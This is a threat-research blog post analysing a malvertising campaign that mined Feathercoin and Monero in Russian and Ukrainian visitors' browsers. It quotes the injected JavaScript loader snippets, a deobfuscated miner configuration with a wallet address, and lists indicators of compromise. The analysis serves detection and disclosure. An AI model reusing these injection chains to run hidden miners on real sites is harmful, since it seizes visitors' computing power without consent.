In the last months, we stumbled upon some JavaScript files apparently used to mine cryptocurrencies directly within the browser. For a long time now, cybercriminals have taken advantage of cryptocurrency mining in order to make a profit. However, they generally use malware or potentially unwanted applications they install on the victim’s machine in order to turn a dishonest penny.
In this particular case, the mining is performed directly within the browser when the user browses to certain websites. Thus, there is no need to infect the victim's machine or to exploit vulnerabilities. All that is needed is a browser with JavaScript activated, which is the default state of most browsers. This blogpost describes the research we performed in order to better understand this threat.
We started digging into our telemetry and found that the threat was partially distributed using malvertising. This kind of CPU-intensive task is generally prohibited by the majority of ad networks because it substantially degrades the user experience. It might seem counterintuitive to mine cryptocurrencies in the browser – we know that mining bitcoins requires a lot of CPU power – but the cybercriminals, as we will see later on, chose to mine cryptocurrencies that do not require custom hardware to mine effectively. Also, it is easier to reach a significant number of machines by “infecting” websites than it is by infecting user machines.
Even though this kind of unwanted behavior can be used in any country, we noticed that this particular campaign was mostly impacting Russia and Ukraine.
Figure 1 shows the five main countries affected by this threat. It is important to note that this targeting is probably due to the language of the websites in which the scripts are injected, as we were able to access them from a US IP address.
Figure 2 shows the historical Cisco Umbrella Top 1M rank of one of the domains –reasedoper[.]pw – hosting these scripts. We notice a significant increase in DNS lookups for the domain over the March-April 2017 period. On June 28th 2017 reasedoper[.]pw was ranked 26,300th. This is almost the same rank as GitHub’s quite popular text-sharing website GitHub Gist (gist.github.com), which was ranked 26,293rd on the same date.
History
The idea of cryptocurrency mining in browsers is not something new. In 2013, a group of MIT students founded a company called Tidbit, which offered a web service to mine Bitcoins. Instead of displaying advertisements, webmasters could include Tidbit’s scripts in their websites to earn money via Bitcoin mining. However, the service founders were served a subpoena by the New Jersey Attorney General’s office because they used the users’ computing power without their agreement. They finally reached a settlement, but had to abandon their project.
Previously, several other services, such as bitp[.]it, provided web browser Bitcoin mining. Due to increasing inefficiency of mining Bitcoins using a regular CPU or GPU, these services have shut down. For example, the bitp[.]it project closed in July, 2011.
How it is distributed
The distribution method of this kind of script is a key point for determining if it is legitimate or unwanted. In this particular case, we were able to find two distinct ways users can be forced to execute these scripts: malvertising and a hardcoded snippet of JavaScript code. Figure 3 shows the global distribution scheme of the mining scripts.
Malvertising
The main distribution method of the mining scripts is malvertising. Generally, it consists of buying traffic from an ad network and distributing malicious JavaScript instead of a traditional advertisement. In this particular case, we are not sure if the injection of the script was intended or if listat[.]biz was compromised. However, listat[.]biz is really suspicious as it seems to mimic LiveInternet counter (LI stat), which is a legitimate web counter. Moreover, many suspicious domains have been registered with the same email address, including lmodr[.]biz, which is also present in the malvertising chain.
The main websites that provided traffic to the mining scripts during July 2017 are shown in Figure 4. We notice that most are video streaming or in-browser gaming websites. This makes sense, since their users tend to spend more time on the same webpage while they watch a movie or play a game. Additionally, such webpages would be expected to have a higher than normal CPU load, which would tend to mask the additional load from the mining script. Thus, it allows the mining scripts to run longer and use more computing power.
The site we observed with most malicious ad impressions, okino[.]tv, seems to be particularly popular. At the time of writing, it had an Alexa Rank of 907 in Russia and 233 in Ukraine. Some of the other websites also seem to be popular, being in the Alexa Top 1000 for Russia.
Figure 6 shows the CPU consumption when visiting the wotsite[.]net website. A specific example of the redirection chain described in Figure 3, above, is provided in Figure 7. The first three hops just inject the script provided by the next hop, as shown in Figures 8, 9 and 10. The first domain used in the redirection (skyadsvideo1[.]ru in our example) is not always the same. We also have seen code.moviead55[.]ru. Both have resolved to the same IP addresses, 167.114.238.246 and 167.114.249.120. According to Whois data for the domain skyad[.]video, whose subdomain code.skyad[.]video also resolved to the same two IP adresses, the domains seem to be related to the SkyAdVideo ad network owner.<!--noindex-->
<div id="sky_video"></div>
<script type="text/javascript" src="http://skyadsvideo1.ru/code.php?v=e225aa8e9c1a68539730f11001490407"></script>
<!--/noindex-->
Figure 8 - From the Okino[.]tv homepage.
var script = document.createElement('script');
script.src = '//lmodr[.]biz/mdstat2.php';
script.async = true;
document.head.appendChild(script)
Figure 9 - From the script at Skyadsvideo1[.]ru/code.php (after deobfuscation).
var script = document.createElement('script');
script.src = '//listat[.]biz/3.html?group=mdstat2_net&seoref=' + encodeURIComponent(document.referrer) + '&rnd=' + Math.random() + '&HTTP_REFERER=' + encodeURIComponent(document.URL);
script.async = true;
document.head.appendChild(script);
Figure 10 - lmodr[.]biz/mdstat2.php.
A search on PassiveTotal shows listat[.]biz was only redirecting to the mining scripts, except on June 1 and July 5 where it was also redirecting to real web counters and to anstatalsl[.]biz. Thus, it seems that lmodr[.]biz and listat[.]biz are only used to inject the mining scripts.
function show_260() {
var script = document.createElement('script');
script.src = '//mataharirama[.]xyz/launcher.9.single.js';
script.async = true;
document.head.appendChild(script);
}
show_260();
Figure 11 - listat[.]biz/3.html.
Surprisingly, we also noticed that moviead55[.]ru, the first hop, could also inject a miner. It is directly hosted on this website and can mine the ZCash cryptocurrency. It uses a pool, located on ws.zstat[.]net:8889, and communicates through web sockets. However, we were not able to demonstrate similarities in the code with the scripts hosted on reasedoper[.]pw. Thus, it seems that different groups are trying to gain profit by using their visitors’ computing power.
Hardcoded JavaScript code
We also found on Google Cache around sixty websites injected with much the same snippet of JavaScript shown in Figure 10. The homepage of these websites injects a script from a script.php URL.
<script type="text/javascript">
document.write("<script type=text/javascript src=\""+"/script.php?group=4goodluck_org&r="+encodeURIComponent(document.referrer)+"&p="+encodeURIComponent(document.URL)+"\"><\/script>");
</script>
Figure 12 - Script injection in the homepage.
This script calls URLs from various domains including static.reasedoper[.]pw, which hosts the JS scripts used for mining. The analysis of these scripts is covered in the next section. We also noted that one of the other injected domains, listat[.]org, shares IP addresses with the one used for the malvertising campaign (listat[.]biz). Another similarity is the name of a function, show_260, which is also used in the malvertising campaign.
A non-comprehensive list of affected domains is provided in the IOCs section. None of them seem to be well-known websites.
How it mines cryptocurrency
Several scripts are hosted on static.reasedoper[.]pw and mataharirama[.]xyz. The scripts with multi in their name are multithreaded while those with single use only one thread. They are the main JavaScript files that will launch the workers to mine different cryptocurrencies. These scripts are lightly obfuscated: string literals are written using hexadecimal escape sequence only (“\x42\x43…”).
Figure 13 shows that Feathercoin, Litecoin and Monero can be mined using this script. However, it seems that they are currently not mining Litecoin.
function(_0xab8e5a, _0x36e7b7, _0x4c105c) {
_0x36e7b7[_0x7e60('0x5')] = {
'assets_domain': _0x7e60('0xee'),
'debug': !![],
'feathercoin': {
'pool': _0x7e60('0xef'),
'default_wallet': '6nmfjYVToBWb2ys4deasdydPj1kW9Gyfp4'
},
'monero': {
'pool': _0x7e60('0xf0'),
'default_wallet': _0x7e60('0xf1')
},
'litecoin': {
'pool': '',
'default_wallet': ''
}
};
}
Figure 13 - Three coins can be mined.
Feathercoin and Litecoin are cryptocurrencies inspired by Bitcoin. The main difference is that they use different hash algorithms: neoscrypt and scrypt, respectively. The goal is to reduce the necessity of using custom hardware, like ASIC miners, rather than regular CPUs. To mine them requires not only CPU power but also a large amount of memory.
The last altcoin, Monero, is different from the other two. Its main feature is stronger privacy in comparison to Bitcoin. It is hard to trace transactions because the blockchain is not transparent. In particular, it uses ring signatures to hide the sender address among several possible sender addresses. It also generates a new public key for each transfer in order to hide the real receiver. The hash algorithm used, cryptonight, also requires a lot of memory. Thus, it makes sense to choose this kind of altcoin for JavaScript mining on regular machines.
As mining requires a lot of computing power, it is not surprising that the operator decided to use asm.js instead of regular JavaScript for implementing the hash algorithms. Asm.js is said to be between 1.5 and 2 times slower than the regular implementation of these algorithms in C. Three of them are provided: scrypt.asm.js (Litecoin), cryptonight.asm.js (Monero) and neoscrypt.asm.js (Feathercoin).
Finally, the Feathercoin wallet address is the same in all the scripts, while several different Monero addresses are used. However, the same addresses are shared in several scripts; thus, we believe they all belong to the same group. As Monero's main feature is anonymity, we were not able to access the amount of money stored in the wallets. As for Feathercoin, the address was not seen in the network. We are not sure of the reason for this, but it could be due to the use of a mining pool.
Link with previous web miners
In the mining scripts, we found a hardcoded Feathercoin address, 6nmfjYVToBWb2ys4deasdydPj1kW9Gyfp4. A quick search on Google shows that this address has already been used for several years.
In a blogpost published at the beginning of 2016, an internet user was complaining about a script using 100% CPU. What they described is very similar to what we have analysed and the Feathercoin address matches. At the time of that discovery, the mining script was hosted on minecrunch[.]co. Searching for this domain leads to a topic on cryptocurrencytalk.com in which the user Kukunin describes its “humble service – MineCrunch”. Regarding the performance, Kukunin explains:
“While classic CPU mining gives too few profit, distributed mining (hundreds and thousands of visitors) of some new Cryptocoin (cpu-only or so) with nearly native speed (thanks to asm.js) may be very sweet.
[…]
The C Scrypt miner was compiled to Javascript by using Emscripten to achieve the best performance. The performance is about 1.5x slower than native cpuminer application.”
A link in the first post (https://kukunin.github.io/webminer/) shows the same Feathercoin address as an example. This reinforces the link between the reasedoper[.]pw miner and minecrunch[.]co. However, if the objective of MineCrunch was to propose an open service for distributed mining, the profits generated by reasedoper[.]pw would apparently benefit only MineCrunch’s author (or the owners of the hardcoded addresses), as it is unlikely to be possible to specify an affiliate identifier.
Conclusion
Despite the performance downgrade of using a JavaScript miner rather than a native program, the number of visitors received by the miner website probably allows them to make profits. In June, there was as many DNS lookups for reasedoper[.]pw as for gist.github.com according to Cisco Umbrella Top 1M.
Even if it can be considered as an alternative to traditional ads, this behavior is unwanted when there is no user consent. The New Jersey Division of Consumer Affairs considered that mining bitcoins on a user’s machine without consent is equivalent to gaining access to the computer. Thus, the developers of such services should advertise it clearly before starting mining, which is clearly not the case in a distribution scheme using malvertising.
Finally, users can protect themselves against this kind of threat by having a well-configured ad blocker or script blocker add-on installed in their browser(s). ESET users may protect themselves from these malicious scripts, detected as JS/CoinMiner.A potentially unsafe application, by enabling detection of Potentially UnSafe Apps. See https://support.eset.com/kb3204.
IOCs
Mining and Malvertising URLs
Domain | URL | Note |
---|---|---|
static.reasedoper.pw | static.reasedoper[.]pw/launcher.0.single.js static.reasedoper[.]pw/launcher.1.single.js static.reasedoper[.]pw/launcher.2.single.js static.reasedoper[.]pw/launcher.0.multi.js static.reasedoper[.]pw/launcher.1.multi.js static.reasedoper[.]pw/launcher.2.multi.js […] |
Website that hosts the mining scripts. |
mataharirama[.]xyz | mataharirama[.]xyz/launcher.9.single.js |
|
listat[.]biz | listat[.]biz/3.html | Redirect to reasedoper[.]pw or mataharirama[.]xyz. |
lmodr[.]biz | lmodr[.]biz/mdstat.php | Redirect to listat[.]biz |
Hash
Hash (SHA-1) | File name | Detection name |
---|---|---|
fa2f4cf2f38383477a0a78d7e3d0841f254c5adf | launcher.0.multi.js | #rowspan# |
b9cd68313b72deac23a53f44ae68598ec139ad27 | launcher.0.single.js | #rowspan# |
e44c502ff69b6bbe291e8125304203af0f675aa3 | launcher.1.multi.js | #rowspan# |
7ce2fb5cea77cbd38cd54533bce81d1b0b0d7a82 | launcher.1.single.js | #rowspan# |
3b28b5f079f6d2bdaa028b31a2b5fa9734f832f2 | launcher.2.multi.js | #rowspan# |
51b97b46fe53cc5aaedc3f45d6517a74008ca9cd | launcher.2.single.js | #rowspan# |
38ccae4555505c8d5f36a9d9c9a20fe80a11304a | launcher.3.multi.js | #rowspan# |
2aa56f945c7d3805d3ee7851cdd4e932f1cd3160 | launcher.3.single.js | #rowspan# |
ae6fe31b8355a3e70d6bf6c89ff7ae18c8de41d0 | launcher.4.single.js | #rowspan# |
fc7e8fb976cc260ceb680e10713e4640b23dde79 | launcher.4.multi.js | #rowspan# |
d5482f2f7bab8a8832f65f6ba5dc2edc5e19687f | launcher.5.multi.js | #rowspan# |
b5d475d9c084d652faabe3888bbda5b673ebe9dd | launcher.5.single.js | #rowspan# |
626646c572211e157dceeb4b918b9f46c3c656f5 | launcher.6.single.js | #rowspan# |
3c70b32180c2e6ae39006eee867135650c98cfa0 | launcher.6.multi.js | #rowspan# |
80c11eb331758a4d6d581ddcb5ebeca9410afe93 | launcher.7.multi.js | #rowspan# |
52317c0abdc69f356dd2865c1fd35923f8beb7d3 | launcher.7.single.js | #rowspan# |
31d40684cd765ef6625fd9a03d2522d84f0ca79b | launcher.8.single.js | JS/CoinMiner.A potentially unsafe application |
9bc931ec55d1fed45bec1c571a401f4a201a02cf | launcher.8.multi.js | #rowspan# |
afae4cf246125671b7eae976c7329b4e0729e109 | launcher.9.multi.js | #rowspan# |
3ac2e2d827e39bd802d5e3f7619099696bc38955 | launcher.9.single.js | #rowspan# |
c4c5f13f0250364bd1321d038d56dbf1a97154f8 | launcher.10.single.js | #rowspan# |
29695469e53822602d9b1884c2268a68e80df999 | launcher.10.multi.js | #rowspan# |
b34216ee46ea1355cbc956514012e74ff9712129 | launcher.11.multi.js | #rowspan# |
9394db4ba0ee70673d451547fd4ae40bfea6112d | launcher.11.single.js | #rowspan# |
6f0bf3fa4dea541a7293b89661d539bb602218c6 | launcher.12.single.js | #rowspan# |
3512351bd8903ae82cc1162fed4faaafceba893d | launcher.12.multi.js | #rowspan# |
5adf5146a84699b6aca5e9da52bb629bceaa7726 | launcher.13.single.js | #rowspan# |
8c45141791b94e172fd5ad8eaefebe5ebb8e729c | launcher.13.multi.js | #rowspan# |
519928629becb1f8b18a56609b03d4cea3c52ddd | launcher.14.multi.js | #rowspan# |
c5629530af39c99c25f83baee7db4a24a9d0aa03 | launcher.14.single.js | #rowspan# |
bf3a1151bc4f8188f735583257ecbbd1eaff123f | launcher.15.multi.js | #rowspan# |
6e5d2b1b9f1140079f3b48edec09c8515e77e14d | launcher.15.single.js | #rowspan# |
12b1bfd6b49c02f928f0429f1505d114583c213c | monero.worker.js | #rowspan# |
885f102c9d4dd2e286401756ca265e4aa3f7a664 | scrypt.worker.js | #rowspan# |
Domains with hardcoded injection script
allday[.]in[.]ua
anekbook[.]ru
bike[.]co[.]ua
cg-lab[.]ru
dikobras[.]com
doctrina62[.]ru
ekavuz[.]ru
fenix-45[.]ru
ipnalog[.]ru
jobochakov[.]com
kharkov-arenda[.]com[.]ua
kuzdoska[.]ru
laminirovanievolos[.]ru
marlin-group[.]ru
mat4ast[.]com
megalifez[.]net
mirstihoff[.]ru
munirufa[.]ru
murlyka[.]net[.]ua
newscom[.]ru
obad[.]ru
ogms[.]ru
opinionblog[.]ru
optiplast[.]ru
otdamprimy[.]ru
pcook[.]ru
pogelanie[.]info
posbank[.]ru
programs-tv[.]ru
psinovo[.]ru
scoot-club[.]ru
ska4ka[.]com
stihi[.]by
stihoslov[.]ru
subcar[.]org
sumytex[.]in[.]ua
suntehnic[.]ru
td-klassik[.]ru
trbook[.]com[.]ua
vstupino[.]su
x-sport[.]info